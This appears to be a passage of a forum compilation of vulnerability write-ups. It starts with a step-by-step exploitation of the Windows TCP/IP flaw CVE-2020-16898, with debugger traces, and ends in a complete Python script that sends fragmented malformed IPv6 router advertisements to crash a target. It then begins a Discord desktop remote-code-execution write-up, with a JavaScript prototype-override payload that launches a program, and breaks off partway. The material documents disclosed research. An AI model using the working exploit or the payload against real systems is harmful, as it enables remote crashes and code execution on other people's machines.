extra information which I could find were the write-ups provided by the detection logic. This is quite a funny twist of fate that the information on how to protect against attack was helpful in exploitation Write-ups: https://github.com/advanced-threat-research/CVE-2020-16898 https://news.sophos.com/en-us/2020/10/13/top-reason-to-apply-october-2020s-microsoft-patches-ping-of-death-redux/ The most crucial is the following information: “While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).” OK, what we have learned from it? Quite a lot: We need to send RDNSS packet The problem is an even number in the Length field Function responsible for parsing the packet will reference the last 8 bytes of RDNSS payload as a next header That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet. RDNSS Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006😞 5.1. Recursive DNS Server Option The RDNSS option contains one or more IPv6 addresses of recursive DNS servers. All of the addresses share the same lifetime value. If it is desirable to have different lifetime values, multiple RDNSS options can be used. Figure 1 shows the format of the RDNSS option. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Type | Length | Reserved | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Lifetime | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | : Addresses of IPv6 Recursive DNS Servers : | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Description of the Length field: Length 8-bit unsigned integer. The length of the option (including the Type and Length fields) is in units of 8 octets. The minimum value is 3 if one IPv6 address is contained in the option. Every additional RDNSS address increases the length by 2. The Length field is used by the receiver to determine the number of IPv6 addresses in the option. This essentially means that Length must always be an odd number as long as there is any payload. OK, let’s create a RDNSS package. How to do it? I’m using scapy since it’s the easiest and fasted way for creating any packages which we want. It is very simple: v6_dst = <destination address> v6_src = <source address> c = ICMPv6NDOptRDNSS() c.len = 7 c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ] pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c send(pkt) When we set-up a kernel debugger and analyze all the public symbols from the tcpip.sys driver we can find interesting function names: tcpip!Ipv6pHandleRouterAdvertisement tcpip!Ipv6pUpdateRDNSS Let’s try to set the breakpoints there and see if our package arrives: 0: kd> bp tcpip!Ipv6pUpdateRDNSS 0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement 0: kd> g Breakpoint 0 hit tcpip!Ipv6pHandleRouterAdvertisement: fffff804`483ba398 48895c2408 mov qword ptr [rsp+8],rbx 0: kd> kpn # Child-SP RetAddr Call Site 00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement 01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340 02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a 03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228 04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f 05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc 06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e 07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2 08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78 09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d 0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311 0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530 0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370 0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0 0: kd> g ... Hm… OK. We never hit Ipv6pUpdateRDNSS but we did hit Ipv6pHandleRouterAdvertisement. This means that our package is fine. Why the hell we did not end up in Ipv6pUpdateRDNSS? Problem 1 – IPv6 link-local address We are failing validation of the address here: fffff804`483ba4b4 458a02 mov r8b,byte ptr [r10] fffff804`483ba4b7 8d5101 lea edx,[rcx+1] fffff804`483ba4ba 8d5902 lea ebx,[rcx+2] fffff804`483ba4bd 41b7c0 mov r15b,0C0h fffff804`483ba4c0 4180f8ff cmp r8b,0FFh fffff804`483ba4c4 0f84a8820b00 je tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772) fffff804`483ba4ca 33c0 xor eax,eax fffff804`483ba4cc 498bca mov rcx,r10 fffff804`483ba4cf 48898570010000 mov qword ptr [rbp+170h],rax fffff804`483ba4d6 48898578010000 mov qword ptr [rbp+178h],rax fffff804`483ba4dd 4484d2 test dl,r10b fffff804`483ba4e0 0f8599820b00 jne tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f) fffff804`483ba4e6 4180f8fe cmp r8b,0FEh fffff804`483ba4ea 0f85ab820b00 jne tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0] r10 points to the beginning of the address: 0: kd> dq @r10 ffffcb82`f9a5b03a 000052b0`80db12fd e5f5087c`645d7b5d ffffcb82`f9a5b04a 000052b0`80db12fd b7220a02`ea3b3a4d ffffcb82`f9a5b05a 08070800`e56c0086 00000000`00000000 ffffcb82`f9a5b06a ffffffff`00000719 aaaaaaaa`aaaaaaaa ffffcb82`f9a5b07a aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa ffffcb82`f9a5b08a aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa ffffcb82`f9a5b09a aaaaaaaa`aaaaaaaa 63733a6e`12990c28 ffffcb82`f9a5b0aa 70752d73`616d6568 643a6772`6f2d706e These bytes: ffffcb82`f9a5b03a 000052b0`80db12fd e5f5087c`645d7b5d are matching my IPv6 address which I’ve used as a source address: v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5" It is compared with byte 0xFE. By looking here We can learn that: fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4). OK, so it is looking for the link-local prefix. Another interesting check is when we fail the previous one: fffff804`4847279b e8f497f8ff call tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94) fffff804`484727a0 84c0 test al,al fffff804`484727a2 0f85567df4ff jne tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe) fffff804`484727a8 4180f8fe cmp r8b,0FEh fffff804`484727ac 7515 jne tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3) It is checking if we are coming from the LOOPBACK, and next we are validated again for being the link-local. I’ve modified the packet to use link-local address and… Breakpoint 1 hit tcpip!Ipv6pUpdateRDNSS: fffff804`4852a534 4055 push rbp 0: kd> kpn # Child-SP RetAddr Call Site 00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS 01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927 02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340 03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a 04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228 05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f 06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc 07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e 08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2 09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78 0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d 0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311 0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530 0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370 0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0 Works! OK, let’s move to the triggering bug phase. Triggering the bug What we know from the detection logic write-up: “we check to see if the Length (second byte in the Option) is an even number” Let’s test it: v6_dst = <destination address> v6_src = <source address> c = ICMPv6NDOptRDNSS() c.len = 6 c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ] pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c send(pkt) and we end up executing this code: fffff804`4852a5b3 4c8b15be8b0700 mov r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] fffff804`4852a5ba e8113bceff call fffff804`4820e0d0 fffff804`4852a5bf 418bd7 mov edx,r15d fffff804`4852a5c2 498bce mov rcx,r14 fffff804`4852a5c5 488bd8 mov rbx,rax fffff804`4852a5c8 e8a39de5ff call tcpip!NetioAdvanceNetBuffer (fffff804`48384370) fffff804`4852a5cd 0fb64301 movzx eax,byte ptr [rbx+1] fffff804`4852a5d1 8d4e01 lea ecx,[rsi+1] fffff804`4852a5d4 2bc6 sub eax,esi fffff804`4852a5d6 4183cfff or r15d,0FFFFFFFFh fffff804`4852a5da 99 cdq fffff804`4852a5db f7f9 idiv eax,ecx fffff804`4852a5dd 8b5304 mov edx,dword ptr [rbx+4] fffff804`4852a5e0 8945b7 mov dword ptr [rbp-49h],eax fffff804`4852a5e3 8bf0 mov esi,eax fffff804`4852a5e5 413bd7 cmp edx,r15d fffff804`4852a5e8 7412 je tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc) Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as: tmp = (Length - 1) / 2 This logic generates the same result for the odd and even number: (7 – 1) / 2 => 3 (6 – 1) / 2 => 3 There is nothing wrong with that by itself. However, this also “defines” how long is the package. Since IPv6 addresses are 16 bytes long, by providing even number, the last 8 bytes of the payload will be used as a beginning of the next header. We can see that in the Wireshark as well: That’s pretty interesting. However, what to do with that? What next header should we fake? Why this matters at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find it out Hunting for the correct header(s) (Problem 2) If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml😞 What we do know is that ICMPv6 messages have the following general format: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Type | Code | Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | + Message Body + | | First byte is encoding “type” of the package. I’ve made the test and I’ve generated next header to be exactly the same as the “buggy” RDNSS one. I’ve been hitting breakpoint for tcpip!Ipv6pUpdateRDNSS but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I’ve run my IDA Pro and started to analyze what’s going on and what logic is being executed. After some reverse engineering I realized that we have 2 loops in the code: First loop goes through all the headers and does some basic validation (size of length etc) Second loop doesn’t do any more validation but parses the package. As soon as there are more ‘optional headers’ in the buffer, we are in the loop. That’s a very good primitive! Anyway, I still don’t know what headers should be used and to find it out I had been brute-forcing all the ‘optional header’ types in the triggered bug and found out that second loop cares only about: Type 3 (Prefix Information) Type 24 (Route Information) Type 25 (RDNSS) Type 31 (DNS Search List Option) I’ve analyzed Type 24 logic since it was much “smaller / shorter” than Type 3. Stack overflow OK. Let’s try to generate the malicious RDNSS packet “faking” Route Information as a next one: v6_dst = <destination address> v6_src = <source address> c = ICMPv6NDOptRDNSS() c.len = 6 c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ] pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c send(pkt) This never hits tcpip!Ipv6pUpdateRDNSS function. Problem 3 – size of the package. After debugging I’ve realized that we are failing in the following check: fffff804`483ba766 418b4618 mov eax,dword ptr [r14+18h] fffff804`483ba76a 413bc7 cmp eax,r15d fffff804`483ba76d 0f85d0810b00 jne tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943) where eax is the size of the package and r15 keeps an information of how much data were consumed. In that specific case we have: rax = 0x48 r15 = 0x40 This is exactly 8 bytes difference because we use an even number. To bypass it, I’ve placed another header just after the last one. However, I was still hitting the same problem It took me some time to figure out how to play with the packet layout to bypass it. I’ve finally managed to do so. Problem 4 – size again! Finally, I’ve found the correct packet layout and I could end up in the code responsible for handling Route Information header. However, I did not Here is why. After returning from the RDNSS I ended up here: fffff804`48472cba e875780b00 call tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534) fffff804`48472cbf 440fb77c2462 movzx r15d,word ptr [rsp+62h] fffff804`48472cc5 e9c980f4ff jmp tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93) ... fffff804`483bad15 4c8b155c841e00 mov r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0 fffff804`483bad1c e8af33e5ff call fffff804`4820e0d0 ... fffff804`483bad15 4c8b155c841e00 mov r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] fffff804`483bad1c e8af33e5ff call fffff804`4820e0d0 fffff804`483bad21 0fb64801 movzx ecx,byte ptr [rax+1] fffff804`483bad25 66c1e103 shl cx,3 fffff804`483bad29 66894c2462 mov word ptr [rsp+62h],cx fffff804`483bad2e 6685c9 test cx,cx fffff804`483bad31 0f8485060000 je tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc) fffff804`483bad37 0fb7c9 movzx ecx,cx fffff804`483bad3a 413b4e18 cmp ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8 fffff804`483bad3e 0f8778060000 ja tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc) ecx keeps the information about the “Length” of the “fake header”. However, [r14+18h] points to the size of the data left in the package. I set Length to the max (0xFF) which is multiplied by 8 (2040 == 0x7f8). However, there is only “0xb8” bytes left. So, I’ve failed another size validation! To be able to fix it, I’ve decreased the size of the “fake header” and at the same time attached more data to the package. That worked! Problem 5 – NdisGetDataBuffer() and fragmentation I’ve finally found all the puzzles to be able to trigger the bug. I thought so… I ended up executing the following code responsible for handling Route Information message: fffff804`48472cd9 33c0 xor eax,eax fffff804`48472cdb 44897c2420 mov dword ptr [rsp+20h],r15d fffff804`48472ce0 440fb77c2462 movzx r15d,word ptr [rsp+62h] fffff804`48472ce6 4c8d85b8010000 lea r8,[rbp+1B8h] fffff804`48472ced 418bd7 mov edx,r15d fffff804`48472cf0 488985b8010000 mov qword ptr [rbp+1B8h],rax fffff804`48472cf7 448bcf mov r9d,edi fffff804`48472cfa 488985c0010000 mov qword ptr [rbp+1C0h],rax fffff804`48472d01 498bce mov rcx,r14 fffff804`48472d04 488985c8010000 mov qword ptr [rbp+1C8h],rax fffff804`48472d0b 48898580010000 mov qword ptr [rbp+180h],rax fffff804`48472d12 48898588010000 mov qword ptr [rbp+188h],rax fffff804`48472d19 4c8b1558041300 mov r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0 It tries to get the “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has value “0x100”. Destination address is pointing to the stack which represents Route Information header. It is a very small buffer. So, we should have classic stack overflow, but inside of the NdisGetDataBuffer function I ended-up executing this: fffff804`4820e10c 8b7910 mov edi,dword ptr [rcx+10h] fffff804`4820e10f 8b4328 mov eax,dword ptr [rbx+28h] fffff804`4820e112 8bf2 mov esi,edx fffff804`4820e114 488d0c3e lea rcx,[rsi+rdi] fffff804`4820e118 483bc8 cmp rcx,rax fffff804`4820e11b 773e ja fffff804`4820e15b fffff804`4820e11d f6430a05 test byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c fffff804`4820e121 0f84813f0400 je fffff804`482520a8 fffff804`4820e127 488b4318 mov rax,qword ptr [rbx+18h] fffff804`4820e12b 4885c0 test rax,rax fffff804`4820e12e 742b je fffff804`4820e15b fffff804`4820e130 8b4c2470 mov ecx,dword ptr [rsp+70h] fffff804`4820e134 8d55ff lea edx,[rbp-1] fffff804`4820e137 4803c7 add rax,rdi fffff804`4820e13a 4823d0 and rdx,rax fffff804`4820e13d 483bd1 cmp rdx,rcx fffff804`4820e140 7519 jne fffff804`4820e15b fffff804`4820e142 488b5c2450 mov rbx,qword ptr [rsp+50h] fffff804`4820e147 488b6c2458 mov rbp,qword ptr [rsp+58h] fffff804`4820e14c 488b742460 mov rsi,qword ptr [rsp+60h] fffff804`4820e151 4883c430 add rsp,30h fffff804`4820e155 415f pop r15 fffff804`4820e157 415e pop r14 fffff804`4820e159 5f pop rdi fffff804`4820e15a c3 ret fffff804`4820e15b 4d85f6 test r14,r14 In the first ‘cmp‘ instruction, rcx register keeps the value of the requested size. Rax register keeps some huge number, and because of that I could never jump out from that logic. As a result of that call, I had been getting a different address than local stack address and none of the overflow happens. I didn’t know what was going on… So, I started to read the documentation of this function and here is the magic: “If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows: If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter. If the Storage parameter is NULL, the return value is NULL.” Here we go… Our big package is kept somewhere in NDIS and pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google if anyone was already hitting that problem and… of course yes Looking at this link: http://newsoft-tech.blogspot.com/2010/02/ we can learn that the simplest solution is to fragment the package. This is exactly what I’ve done and…. KDTARGET: Refreshing KD connection *** Fatal System Error: 0x00000139 (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. nt!DbgBreakPointWithStatus: fffff804`45bca210 cc int 3 0: kd> kpn # Child-SP RetAddr Call Site 00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus 01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12 02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947 03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107 04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69 05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0 06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323 07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5 08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef 09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa 14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa ... Here we go! Proof-of-Concept Code can be found here: http://site.pi3.com.pl/exp/p_CVE-2020-16898.py #!/usr/bin/env python3 # # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability # # Author: Adam 'pi3' Zabrocki # http://pi3.com.pl # from scapy.all import * v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b" v6_src = "fe80::24f5:a2ff:fe30:8890" p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18" p_test = p_test_half + 'A'.encode()*4 c = ICMPv6NDOptEFA(); e = ICMPv6NDOptRDNSS() e.len = 21 e.dns = [ "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ] pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \ Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \ IPv6ExtHdrFragment()/pkt l=fragment6(p_test_frag, 200) for p in l: send(p) Thanks, Adam Surs: http://blog.pi3.com.pl/?p=780
  20. CVE-2020-16898 PoC BSOD for CVE-2020-16898 (badneighbor) Tested against Windows 10 version 2004 Sursa: https://github.com/0xeb-bp/cve-2020-16898
  21. MKSB(en) Masato Kinugawa's Security Blog / @kinugawamasato Saturday, October 17, 2020 Discord Desktop app RCE A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Program. The RCE I found was an interesting one because it is achieved by combining multiple bugs. In this article, I'd like to share the details. Why I chose Discord for the target I kind of felt like finding for vulnerabilities of the Electron app, so I was looking for a bug bounty program which pays the bounty for an Electron app and I found Discord. Also, I am a Discord user and simply wanted to check if the app I'm using is secure, so I decided to investigate. Bugs I found Basically I found the following three bugs and achieved RCE by combining them. Missing contextIsolation XSS in iframe embeds Navigation restriction bypass (CVE-2020-15174) I'll explain these bugs one by one. Missing contextIsolation When I test Electron app, first I always check the options of the BrowserWindow API, which is used to create a browser window. By checking it, I think about how RCE can be achieved when arbitrary JavaScript execution on the renderer is possible. The Discord's Electron app is not an open source project but the Electron's JavaScript code is saved locally with the asar format and I was able to read it just by extracting it. In the main window, the following options are used: const mainWindowOptions = { title: 'Discord', backgroundColor: getBackgroundColor(), width: DEFAULT_WIDTH, height: DEFAULT_HEIGHT, minWidth: MIN_WIDTH, minHeight: MIN_HEIGHT, transparent: false, frame: false, resizable: true, show: isVisible, webPreferences: { blinkFeatures: 'EnumerateDevices,AudioOutputDevices', nodeIntegration: false, preload: _path2.default.join(__dirname, 'mainScreenPreload.js'), nativeWindowOpen: true, enableRemoteModule: false, spellcheck: true } }; The important options which we should check here are especially nodeIntegration and contextIsolation. From the above code, I found that the nodeIntegration option is set to false and the contextIsolation option is set to false (the default of the used version) in the Discord's main window. If the nodeIntegration is set to true, a web page's JavaScript can use Node.js features easily just by calling the require(). For example, the way to execute the calc application on Windows is: <script> require('child_process').exec('calc'); </script> In this time, the nodeIntegration was set to false, so I couldn't use Node.js features by calling the require() directly. However, there is still a possibility of access to Node.js features. The contextIsolation, another important option, was set to false. This option should not be set to false if you want to eliminate the possibility of RCE on your app. If the contextIsolation is disabled, a web page's JavaScript can affect the execution of the Electron's internal JavaScript code on the renderer, and preload scripts (In the following, these JavaScript will be referred to as the JavaScript code outside web pages). For example, if you override Array.prototype.join, one of the JavaScript built-in methods, with another function from a web page's JavaScript, the JavaScript code outside web pages also will use the overridden function when the join is called. This behavior is dangerous because Electron allows the JavaScript code outside web pages to use the Node.js features regardless the nodeIntegration option and by interfering with them from the function overridden in the web page, it could be possible to achieve RCE even if the nodeIntegration is set to false. By the way, a such trick was previously not known. It was first discovered in a pentest by Cure53, which I also joined in, in 2016. After that, we reported it to Electron team and the contextIsolation was introduced. Recently, that pentest report was published. If you are interested, you can read it from the following link: Pentest-Report Ethereum Mist 11.2016 - 10.2017 https://drive.google.com/file/d/1LSsD9gzOejmQ2QipReyMXwr_M0Mg1GMH/view You can also read the slides which I used at a CureCon event: The contextIsolation introduces the separated contexts between the web page and the JavaScript code outside web pages so that the JavaScript execution of each code does not affect each. This is a necessary faeture to eliminate the possibility of RCE, but this time it was disabled in Discord. Now I found that the contextIsolation is disabled, so I started looking for a place where I could execute arbitrary code by interfering with the JavaScript code outside web pages. Usually, when I create a PoC for RCE in the Electron's pentests, I first try to achieve RCE by using the Electron's internal JavaScript code on the renderer. This is because the Electron's internal JavaScript code on the renderer can be executed in any Electron app, so basically I can reuse the same code to achieve RCE and it's easy. In my slides, I introduced that RCE can be achieved by using the code which Electron executes at the navigation timing. It's not only possible from that code but there are such code in some places. (I'd like to publish examples of the PoC in the future.) However, depending on the version of Electron used, or the BrowserWindow option which is set, because the code has been changed or the affected code can't be reached correctly, sometimes PoC via the Electron's code does not work well. In this time, it did not work, so I decided to change the target to the preload scripts. When checking the preload scripts, I found that Discord exposes the function, which allows some allowed modules to be called via DiscordNative.nativeModules.requireModule('MODULE-NAME'), into the web page. Here, I couldn't use modules that can be used for RCE directly, such as child_process module, but I found a code where RCE can be achieved by overriding the JavaScript built-in methods and interfering with the execution of the exposed module. The following is the PoC. I was able to confirm that the calc application is popped up when I call the getGPUDriverVersions function which is defined in the module called "discord_utils" from devTools, while overriding the RegExp.prototype.test and Array.prototype.join. RegExp.prototype.test=function(){ return false; } Array.prototype.join=function(){ return "calc"; } DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions(); The getGPUDriverVersions function tries to execute the program by using the "execa" library, like the following: module.exports.getGPUDriverVersions = async () => { if (process.platform !== 'win32') { return {}; } const result = {}; const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`; try { result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, [])); } catch (e) { result.nvidia = {error: e.toString()}; } return result; }; Usually the execa tries to execute "nvidia-smi.exe", which is specified in the nvidiaSmiPath variable, however, due to the overridden RegExp.prototype.test and Array.prototype.join, the argument is replaced to "calc" in the execa's internal processing. Specifically, the argument is replaced by changing the following two parts. https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36 https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55 The remaining work is to find a way to execute JavaScript on the application. If I can find it, it leads to actual RCE. XSS in iframe embeds As explained above, I found that RCE could happen from arbitrary JavaScript execution, so I was trying to find an XSS vulnerability. The app supports the autolink or Markdown feature, but looked like it is good. So I turned my attention to the iframe embeds feature. The iframe embeds is the feature which automatically displays the video player on the chat when the YouTube URL is posted, for example. When the URL is posted, Discord tries to get the OGP information of that URL and if there is the OGP information, it displays the page's title, description, thumbnail image, associated video and so on in the chat. The Discord extracts the video URL from the OGP and only if the video URL is allowed domain and the URL has actually the URL format of the embeds page, the URL is embedded in the iframe. I couldn't find the documentation about which services can be embedded in the iframe, so I tried to get a hint by checking the CSP's frame-src directive. At that time, the following CSP was used: Content-Security-Policy: [...] ; frame-src https://*.youtube.com https://*.twitch.tv https://open.spotify.com https://w.soundcloud.com https://sketchfab.com https://player.vimeo.com https://www.funimation.com https://twitter.com https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://js.stripe.com https://assets.braintreegateway.com 